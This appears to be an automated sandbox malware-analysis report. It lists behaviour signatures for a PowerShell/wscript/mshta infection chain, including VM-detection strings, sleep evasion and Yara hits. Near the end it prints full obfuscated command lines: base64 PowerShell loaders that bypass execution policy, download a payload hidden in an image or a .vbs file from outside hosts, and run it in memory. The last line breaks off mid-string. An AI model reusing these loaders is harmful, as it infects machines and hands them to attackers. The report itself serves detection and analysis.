Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7203	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2449	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1337	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 872	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5160	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4608	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5284	Thread sleep count: 7203 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4256	Thread sleep count: 2449 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812	Thread sleep count: 5160 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812	Thread sleep count: 4608 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2189731614.0000000006E49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFT_NetEventVmNetworkAdatper.cdxmlP
Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: wscript.exe, 00000006.00000003.2173671558.000000000329D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
Source: powershell.exe, 00000003.00000002.2191805993.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2191805993.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192069020.0000000007E31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000003.2173671558.000000000329D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.2189731614.0000000006E49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VntancxMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.2186146653.0000000004847000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2192069020.0000000007DEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000009.00000002.3060434950.0000000007775000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_6720.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3092.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLz